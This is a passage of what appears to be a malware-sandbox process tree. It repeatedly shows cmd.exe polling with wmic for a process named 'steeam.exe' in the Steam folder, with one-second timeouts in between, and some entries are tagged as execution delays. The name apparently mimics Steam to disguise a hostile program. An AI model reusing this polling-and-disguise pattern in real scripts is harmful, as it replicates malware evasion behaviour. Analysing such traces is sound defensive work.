PID:1264

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3328

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2804

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2232

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4684

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4620

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4996

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4212

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:744

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3860

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:944

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1928

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2948

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1464

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:780

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2888

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4040

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1384

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1596

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4168

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2668

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:700

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4464

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:208

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:932

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4936

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1736

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5044

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4724

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2020

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1376

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2016

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5100

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:240

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3692

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:8

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3256

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:404

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2936

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1840

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5116

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2056

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3092

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:512

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4684

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1820

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4148

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3400

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2224

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:744

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1520

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4348

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2948

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2932

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:8

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4392

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2888

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2912

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3924

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4908

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1048

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1008

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2312

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:212

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4240

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1076

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4620

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1124

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1512

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2632

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4236

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3508

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2808

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2008

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4052

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2812

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5080

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3060

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4916

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4448

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4540

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4996

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4212

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3188

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4724

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4148

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:212

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:96

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3988

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2620

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2456

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1584

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4976

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2008

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4556

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5100

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5056

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4908

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4928

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2804

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2180

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:512

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1612

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1432

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2648

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1376

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1944

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4728

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2904

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3156

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:924

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:428

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4636

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1584

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3336

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2808

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4556

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4684

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4872

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4472

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1004

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2460

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4904

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2640

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4484

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2824

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2268

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1464

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1592

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5104

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:664

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2216

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4876

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3904

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4168

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3336

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1264

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2828

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:400

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4448

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1824

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1004

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5036

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4308

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4444

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:864

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1944

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4884

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2748

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4256

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5104

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1584

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2936

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4132

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4576

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3912

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2812

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2452

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5008

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:920

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:352

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2804

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:744

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1104

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4356

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3624

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4348

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4804

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2276

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1592

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3988

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3560

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5088

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4628

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4688

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4936

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
